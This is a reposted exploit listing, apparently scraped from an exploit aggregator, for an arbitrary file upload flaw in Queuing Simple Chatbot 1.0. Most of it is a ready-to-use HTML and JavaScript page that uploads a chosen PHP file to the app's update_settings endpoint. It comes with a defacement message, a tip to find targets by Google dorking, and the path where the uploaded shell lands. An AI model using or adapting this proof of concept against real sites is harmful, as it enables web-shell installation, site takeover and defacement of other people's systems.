Queuing Simple Chatbot 1.0 Shell Upload exploit

2 months ago 36
BOOK THIS SPACE FOR AD
ARTICLE AD

Share

## https://sploitus.com/exploit?id=PACKETSTORM:181448 ============================================================================================================================================= | # Title : Queuing Simple Chatbot 1.0 Remote File Upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/queuing.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This HTML page is designed to remotely upload PHP malicious files directly. [+] Line 33 set url of target. [+] The path to upload the files : http://127.0.0.1/chatbot/uploads/ [+] Save Code as html : <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Direct arbitrary File Upload</title> </head> <body> <h2>Direct arbitrary File Upload</h2> <form id="uploadForm"> <label for="fileInput">Select File:</label> <input type="file" id="fileInput" name="fileInput" required><br><br> <button type="button" onclick="uploadFile()">Upload File</button> </form> <script> function uploadFile() { const fileInput = document.getElementById('fileInput').files[0]; if (!fileInput) { alert('Please select a file.'); return; } const formData = new FormData(); formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>'); formData.append('img', fileInput); console.log("(+) Uploading file..."); fetch('http://127.0.0.1/chatbot/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL method: 'POST', body: formData }) .then(response => response.text()) .then(data => { if (data === '1') { console.log("(+) File upload seems to have been successful!"); } else { console.log("(-) Oh no, the file upload seems to have failed!"); } }) .catch(error => console.error("(-) Error during file upload:", error)); } </script> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================
Read Entire Article